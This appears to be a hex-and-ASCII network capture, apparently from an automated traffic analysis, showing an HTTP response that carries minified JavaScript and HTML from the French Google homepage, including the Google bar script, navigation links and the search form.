2021-10-16 14:53:59 UTC	6961	IN	Data Raw: 65 6e 67 74 68 7d 2c 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 61 28 61 29 7b 74 3d 61 3b 70 28 22 5f 69 74 6c 22 2c 48 61 2c 75 29 3b 70 28 22 5f 61 65 6d 22 2c 49 61 2c 75 29 3b 70 28 22 6d 6c 22 2c 74 2c 75 29 3b 61 3d 7b 7d 3b 76 2e 65 72 3d 61 7d 68 2e 61 28 22 22 29 3f 4a 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 72 6f 77 20 61 3b 7d 29 3a 68 2e 61 28 22 31 22 29 26 26 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3c 46 61 26 26 4a 61 28 5f 6d 6c 54 6f 6b 65 6e 29 3b 76 61 72 20 5f 45 3d 22 6c 65 66 74 22 2c 4b 61 3d 68 2e 61 28 22 22 29 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 48 28 61 2c 62 29 7c 7c 28 61 2e 63 6c 61 Data Ascii: ength},Ia=function(a,b){return b};function Ja(a){t=a;p("_itl",Ha,u);p("_aem",Ia,u);p("ml",t,u);a={};v.er=a}h.a("")?Ja(function(a){throw a;}):h.a("1")&&Math.random()<Fa&&Ja(_mlToken);var _E="left",Ka=h.a(""),J=function(a,b){var c=a.className;H(a,b)\|\|(a.cla
2021-10-16 14:53:59 UTC	6962	IN	Data Raw: 64 29 7b 72 65 74 75 72 6e 28 64 7c 7c 22 26 22 29 2b 22 71 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 29 7d 29 29 7d 63 61 74 63 68 28 63 29 7b 72 28 63 2c 22 73 62 22 2c 22 70 71 22 29 7d 7d 0a 76 61 72 20 55 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 62 3d 30 2c 63 3b 63 3d 4f 61 5b 62 5d 3b 2b 2b 62 29 28 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 63 29 29 26 26 61 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 61 7d 2c 56 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 55 61 28 29 3b 72 65 74 75 72 6e 20 30 3c 61 2e 6c 65 6e 67 74 68 3f 61 5b 30 5d 3a 6e 75 6c 6c 7d 2c 57 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d Data Ascii: d){return(d\|\|"&")+"q="+encodeURIComponent(b)}))}catch(c){r(c,"sb","pq")}}var Ua=function(){for(var a=[],b=0,c;c=Oa[b];++b)(c=document.getElementById(c))&&a.push(c);return a},Va=function(){var a=Ua();return 0<a.length?a[0]:null},Wa=function(){return docum
2021-10-16 14:53:59 UTC	6964	IN	Data Raw: 22 3b 6d 2e 69 64 3d 63 3b 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 67 62 6d 74 22 3b 6d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 69 66 28 6b 2e 68 61 73 43 68 69 6c 64 4e 6f 64 65 73 28 29 29 7b 63 3d 5b 5b 22 67 62 6b 63 22 5d 2c 5b 22 67 62 66 22 2c 22 67 62 65 22 2c 22 67 62 6e 22 5d 2c 5b 22 67 62 6b 70 22 5d 2c 5b 22 67 62 6e 64 22 5d 5d 3b 64 3d 30 3b 76 61 72 20 6e 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3b 66 3d 21 31 3b 66 6f 72 28 76 61 72 20 6c 3d 2d 31 2c 71 3d 30 2c 45 3b 45 3d 63 5b 71 5d 3b 71 2b 2b 29 7b 66 6f 72 28 76 61 72 20 55 3d 30 2c 49 3b 49 3d 45 5b 55 5d 3b 55 2b 2b 29 7b 66 6f 72 28 3b 64 3c 6e 26 26 48 28 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 2c 49 29 3b 29 64 2b 2b 3b 69 66 28 49 3d 3d 62 29 7b Data Ascii: ";m.id=c;a.className="gbmt";m.appendChild(a);if(k.hasChildNodes()){c=[["gbkc"],["gbf","gbe","gbn"],["gbkp"],["gbnd"]];d=0;var n=k.childNodes.length;f=!1;for(var l=-1,q=0,E;E=c[q];q++){for(var U=0,I;I=E[U];U++){for(;d<n&&H(k.childNodes[d],I);)d++;if(I==b){
2021-10-16 14:53:59 UTC	6965	IN	Data Raw: 3d 0a 21 31 3b 61 2e 63 61 6e 63 65 6c 42 75 62 62 6c 65 3d 21 30 7d 2c 70 62 3d 6e 75 6c 6c 2c 24 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 50 28 29 3b 69 66 28 61 29 7b 71 62 28 61 2c 22 4f 75 76 65 72 74 75 72 65 2e 2e 2e 22 29 3b 51 28 61 2c 21 30 29 3b 62 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 3f 62 3a 31 45 34 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 62 28 61 29 7d 3b 70 62 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 62 29 7d 7d 2c 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 50 28 29 3b 61 26 26 28 51 28 61 2c 21 31 29 2c 71 62 28 61 2c 22 22 29 29 7d 2c 72 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 50 28 29 3b 76 61 72 20 62 3d 61 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 Data Ascii: =!1;a.cancelBubble=!0},pb=null,$a=function(a,b){P();if(a){qb(a,"Ouverture...");Q(a,!0);b="undefined"!=typeof b?b:1E4;var c=function(){rb(a)};pb=window.setTimeout(c,b)}},sb=function(a){P();a&&(Q(a,!1),qb(a,""))},rb=function(a){try{P();var b=a\|\|document.ge
2021-10-16 14:53:59 UTC	6966	IN	Data Raw: 2c 6e 62 29 3b 62 61 3d 68 2e 61 28 22 22 29 3f 53 61 3a 54 61 3b 70 28 22 71 73 22 2c 62 61 29 3b 70 28 22 73 65 74 43 6f 6e 74 69 6e 75 65 43 62 22 2c 51 61 29 3b 70 28 22 70 63 22 2c 52 61 29 3b 70 28 22 62 73 79 22 2c 75 62 29 3b 68 2e 64 3d 61 62 3b 68 2e 6a 3d 74 62 3b 76 61 72 20 77 62 3d 7b 7d 3b 76 2e 62 61 73 65 3d 77 62 3b 77 2e 70 75 73 68 28 5b 22 6d 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 73 65 6d 5f 36 39 61 33 66 61 31 38 35 36 39 34 39 34 33 37 37 30 61 62 61 62 34 63 30 62 33 38 30 33 30 65 2e 6a 73 22 7d 5d 29 3b 67 2e 73 67 3d 7b 63 3a 22 31 22 7d 3b 70 28 22 77 67 22 2c 7b 72 67 3a 7b 7d 7d 29 3b 76 61 72 20 78 62 3d 7b 74 69 77 3a 68 2e 63 28 22 31 35 30 30 30 22 2c 30 29 2c 74 Data Ascii: ,nb);ba=h.a("")?Sa:Ta;p("qs",ba);p("setContinueCb",Qa);p("pc",Ra);p("bsy",ub);h.d=ab;h.j=tb;var wb={};v.base=wb;w.push(["m",{url:"//ssl.gstatic.com/gb/js/sem_69a3fa185694943770abab4c0b38030e.js"}]);g.sg={c:"1"};p("wg",{rg:{}});var xb={tiw:h.c("15000",0),t
2021-10-16 14:53:59 UTC	6968	IN	Data Raw: 64 5b 63 5b 66 5d 5d 3d 64 5b 63 5b 66 5d 5d 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 64 5b 63 5b 66 5d 5d 3d 62 7d 3b 49 62 28 43 62 2c 22 70 77 2e 63 6c 6b 22 29 3b 49 62 28 43 62 2c 22 70 77 2e 68 76 72 22 29 3b 70 28 22 73 75 22 2c 46 62 2c 67 2e 70 77 29 7d 3b 76 61 72 20 4a 62 3d 5b 31 2c 32 2c 33 2c 34 2c 35 2c 36 2c 39 2c 31 30 2c 31 31 2c 31 33 2c 31 34 2c 32 38 2c 32 39 2c 33 30 2c 33 34 2c 33 35 2c 33 37 2c 33 38 2c 33 39 2c 34 30 2c 34 31 2c 34 32 2c 34 33 2c 34 38 2c 34 39 2c 35 30 30 5d 3b 76 61 72 20 4b 62 3d 68 2e 62 28 22 30 2e 30 30 31 22 2c 31 45 2d 34 29 2c 4c 62 3d 68 2e 62 28 22 31 22 2c 31 29 2c 4d 62 3d 21 31 2c 4e 62 3d 21 31 3b 69 66 28 68 2e 61 28 22 31 22 29 29 7b 76 61 72 20 4f 62 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 4f 62 Data Ascii: d[c[f]]=d[c[f]]\|\|{};return d[c[f]]=b};Ib(Cb,"pw.clk");Ib(Cb,"pw.hvr");p("su",Fb,g.pw)};var Jb=[1,2,3,4,5,6,9,10,11,13,14,28,29,30,34,35,37,38,39,40,41,42,43,48,49,500];var Kb=h.b("0.001",1E-4),Lb=h.b("1",1),Mb=!1,Nb=!1;if(h.a("1")){var Ob=Math.random();Ob
2021-10-16 14:53:59 UTC	6969	IN	Data Raw: 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 61 61 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7d 29 7d 2c 54 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 72 6d 28 29 7d 29 7d 2c 55 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 73 70 6e 28 61 29 7d 29 7d 2c 56 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 73 70 73 28 61 29 7d 29 7d 2c 57 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 73 70 70 28 61 29 7d 29 7d 2c 58 62 3d 7b 22 32 37 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 Data Ascii: a,b,c,d,f,k,m,n,l,q){B(function(){g.paa(a,b,c,d,f,k,m,n,l,q)})},Tb=function(){B(function(){g.prm()})},Ub=function(a){B(function(){g.spn(a)})},Vb=function(a){B(function(){g.sps(a)})},Wb=function(a){B(function(){g.spp(a)})},Xb={"27":"https://lh3.googleuserc
2021-10-16 14:53:59 UTC	6970	IN	Data Raw: 29 26 26 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 63 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 61 63 5b 63 5b 64 5d 5d 3d 21 30 3b 67 2e 75 70 2e 73 70 6c 28 61 2c 62 2c 22 6e 61 70 22 2c 63 29 7d 7d 2c 67 63 3d 0a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 59 28 5b 31 5d 2c 22 61 6f 70 22 29 26 26 63 29 7b 69 66 28 54 29 66 6f 72 28 76 61 72 20 64 20 69 6e 20 54 29 54 5b 64 5d 3d 54 5b 64 5d 26 26 2d 31 21 3d 63 63 28 63 2c 64 29 3b 65 6c 73 65 20 66 6f 72 28 54 3d 7b 7d 2c 64 3d 30 3b 64 3c 63 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 54 5b 63 5b 64 5d 5d 3d 21 30 3b 67 2e 75 70 2e 73 70 6c 28 61 2c 62 2c 22 61 6f 70 22 2c 63 29 7d 7d 2c 68 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 69 66 28 58 3d 32 2c 21 62 63 29 7b 62 63 3d 21 30 Data Ascii: )&&c){for(var d=0;d<c.length;d++)ac[c[d]]=!0;g.up.spl(a,b,"nap",c)}},gc=function(a,b,c){if(Y([1],"aop")&&c){if(T)for(var d in T)T[d]=T[d]&&-1!=cc(c,d);else for(T={},d=0;d<c.length;d++)T[c[d]]=!0;g.up.spl(a,b,"aop",c)}},hc=function(){try{if(X=2,!bc){bc=!0
2021-10-16 14:53:59 UTC	6971	IN	Data Raw: 63 3d 61 5b 62 5d 3b 62 2b 2b 29 7b 76 61 72 20 64 3d 67 2e 75 70 3b 63 3d 63 20 69 6e 20 64 26 26 64 5b 63 5d 3b 69 66 28 21 63 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 2c 70 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 72 79 7b 69 66 28 69 63 28 61 29 29 72 65 74 75 72 6e 2d 31 3b 76 61 72 20 63 3d 61 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 2f 4f 47 50 43 3d 28 5b 5e 3b 5d 2a 29 2f 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 7b 76 61 72 20 64 3d 63 5b 31 5d 2e 6d 61 74 63 68 28 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 62 22 2b 0a 62 2b 22 2d 28 5b 30 2d 39 5d 2b 29 3a 22 29 29 3b 69 66 28 64 26 26 64 5b 31 5d 29 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 64 5b 31 5d 2c 31 30 29 7d 7d 63 61 74 63 68 28 66 29 7b 66 2e 63 6f 64 65 Data Ascii: c=a[b];b++){var d=g.up;c=c in d&&d[c];if(!c)return!1}return!0},pc=function(a,b){try{if(ic(a))return-1;var c=a.cookie.match(/OGPC=([^;]*)/);if(c&&c[1]){var d=c[1].match(new RegExp("\\b"+b+"-([0-9]+):"));if(d&&d[1])return parseInt(d[1],10)}}catch(f){f.code
2021-10-16 14:53:59 UTC	6973	IN	Data Raw: 2e 61 6f 6d 63 3d 66 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 61 2e 6d 63 66 28 22 70 6d 22 2c 7b 70 3a 22 22 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f Data Ascii: .aomc=f;}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var a=window.gbar;a.mcf("pm",{p:""});}catch(e){window.gbar&&gbar.lo
2021-10-16 14:53:59 UTC	6974	IN	Data Raw: 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 62 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 63 3d 62 2e 69 3b 76 61 72 20 64 3d 63 2e 61 2c 65 3d 63 2e 63 2c 66 3d 7b 63 74 79 3a 22 46 52 41 22 2c Data Ascii: ;}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var a=this\|\|self;var b=window.gbar;var c=b.i;var d=c.a,e=c.c,f={cty:"FRA",
2021-10-16 14:53:59 UTC	6975	IN	Data Raw: 64 6f 63 75 6d 65 6e 74 2e 67 62 71 66 2e 71 2e 66 6f 63 75 73 28 29 3b 7d 0a 7d 0a 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 6d 6e 67 62 22 3e 3c 64 69 76 20 69 64 3d 67 62 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 75 75 78 44 56 33 63 50 66 4b 45 4a 58 50 51 63 66 4d 56 51 66 77 3d 3d 27 3e 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 65 6c 69 26 26 67 62 61 72 2e 65 6c 69 28 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 67 62 77 3e 3c 64 69 76 20 69 64 3d 67 62 7a 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 63 62 3e 3c 2f 73 70 61 6e 3e 3c 6f 6c 20 69 64 3d 67 62 7a 63 20 63 6c 61 73 73 3d 67 62 74 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 7a 74 20 67 62 7a Data Ascii: document.gbqf.q.focus();}}})();</script><div id="mngb"><div id=gb><script nonce='uuxDV3cPfKEJXPQcfMVQfw=='>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz
2021-10-16 14:53:59 UTC	6976	IN	Data Raw: 2f 2f 64 72 69 76 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 44 72 69 76 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 67 74 20 69 64 3d 67 62 7a 74 6d 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 66 72 2f 69 6e 74 6c 2f 66 72 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 3d 77 68 22 20 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 74 72 75 65 20 61 72 69 61 2d 6f 77 6e 73 3d 67 62 64 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d Data Ascii: //drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.fr/intl/fr/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=
2021-10-16 14:53:59 UTC	6978	IN	Data Raw: 6c 65 2e 66 72 2f 3f 68 6c 3d 66 72 26 74 61 62 3d 77 76 22 3e 56 69 64 e9 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 35 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 3f 75 73 70 3d 64 6f 63 73 5f 61 6c 63 22 3e 44 6f 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 66 72 2f 69 6e 74 6c 2f 66 72 2f 61 62 6f 75 74 2f 70 Data Ascii: le.fr/?hl=fr&tab=wv">Vidos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.fr/intl/fr/about/p
2021-10-16 14:53:59 UTC	6979	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 74 67 28 65 76 65 6e 74 2c 74 68 69 73 29 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64 35 20 61 72 69 61 2d 6f 77 6e 65 72 3d 67 62 67 35 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 63 3e 3c 6f 6c 20 69 64 3d 67 62 6f 6d 20 63 6c 61 73 73 3d 67 62 6d 63 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 63 20 67 62 6d 74 63 22 3e 3c 61 20 20 63 6c 61 73 73 3d 67 62 6d 74 20 68 72 65 66 3d 22 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 66 72 22 3e 50 61 72 61 6d e8 74 72 65 73 20 64 65 20 72 65 63 68 65 72 63 68 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 Data Ascii: function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=fr">Paramtres de recherche</a></li><li class=gbmtc><div
2021-10-16 14:53:59 UTC	6980	IN	Data Raw: 74 69 74 6c 65 3d 22 52 65 63 68 65 72 63 68 65 20 47 6f 6f 67 6c 65 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 32 30 34 38 22 20 6e 61 6d 65 3d 22 71 22 20 73 69 7a 65 3d 22 35 37 22 3e 3c 2f 64 69 76 3e 3c 62 72 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 76 61 6c 75 65 3d 22 52 65 63 68 65 72 63 68 65 20 47 6f 6f 67 6c 65 22 20 6e 61 6d 65 3d 22 62 74 6e 47 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 Data Ascii: title="Recherche Google" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Recherche Google" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input
2021-10-16 14:53:59 UTC	6982	IN	Data Raw: 75 2c 67 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 76 22 29 3b 67 26 26 28 67 2e 76 61 6c 75 65 3d 61 29 3b 66 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 66 7d 2c 30 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 66 6f 72 6d 3e 3c 64 69 76 20 69 64 3d 22 67 61 63 5f 73 63 6f 6e 74 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 38 33 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 2e 35 65 6d 22 3e 3c 62 72 3e 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 Data Ascii: u,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10
2021-10-16 14:53:59 UTC	6983	IN	Data Raw: 2c 63 73 3a 27 27 2c 65 78 63 6d 3a 5b 5d 7d 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 75 75 78 44 56 33 63 50 66 4b 45 4a 58 50 51 63 66 4d 56 51 66 77 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 27 2f 78 6a 73 2f 5f 2f 6a 73 2f 6b 5c 78 33 64 78 6a 73 2e 68 70 2e 65 6e 2e 71 49 69 5f 4c 51 67 6e 35 5a 49 2e 4f 2f 61 6d 5c 78 33 64 41 50 67 45 57 41 2f 64 5c 78 33 64 31 2f 65 64 5c 78 33 64 31 2f 72 73 5c 78 33 64 41 43 54 39 30 6f 48 65 73 76 39 6d 34 46 42 45 64 30 53 70 49 4e 49 64 69 58 38 46 38 35 68 56 6b 77 2f 6d 5c 78 33 64 73 62 5f 68 65 2c 64 27 3b 0a 76 61 72 20 65 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d Data Ascii: ,cs:'',excm:[]};})();</script> <script nonce="uuxDV3cPfKEJXPQcfMVQfw==">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.qIi_LQgn5ZI.O/am\x3dAPgEWA/d\x3d1/ed\x3d1/rs\x3dACT90oHesv9m4FBEd0SpINIdiX8F85hVkw/m\x3dsb_he,d';var e=this\|\|self,f=function(a){return a}
2021-10-16 14:53:59 UTC	6984	IN	Data Raw: 6f 67 6c 65 2e 78 6a 73 75 3d 27 2f 78 6a 73 2f 5f 2f 6a 73 2f 6b 5c 78 33 64 78 6a 73 2e 68 70 2e 65 6e 2e 71 49 69 5f 4c 51 67 6e 35 5a 49 2e 4f 2f 61 6d 5c 78 33 64 41 50 67 45 57 41 2f 64 5c 78 33 64 31 2f 65 64 5c 78 33 64 31 2f 72 73 5c 78 33 64 41 43 54 39 30 6f 48 65 73 76 39 6d 34 46 42 45 64 30 53 70 49 4e 49 64 69 58 38 46 38 35 68 56 6b 77 2f 6d 5c 78 33 64 73 62 5f 68 65 2c 64 27 3b 7d 29 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 63 29 7b 7d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 6a 6c 3d 7b 61 74 74 6e 3a 66 61 6c 73 65 2c 62 6c 74 3a 27 6e 6f 6e 65 27 2c 63 68 6e 6b 3a 30 2c Data Ascii: ogle.xjsu='/xjs/_/js/k\x3dxjs.hp.en.qIi_LQgn5ZI.O/am\x3dAPgEWA/d\x3d1/ed\x3d1/rs\x3dACT90oHesv9m4FBEd0SpINIdiX8F85hVkw/m\x3dsb_he,d';})();function _DumpException(e){throw e;}function _F_installCss(c){}(function(){google.jl={attn:false,blt:'none',chnk:0,
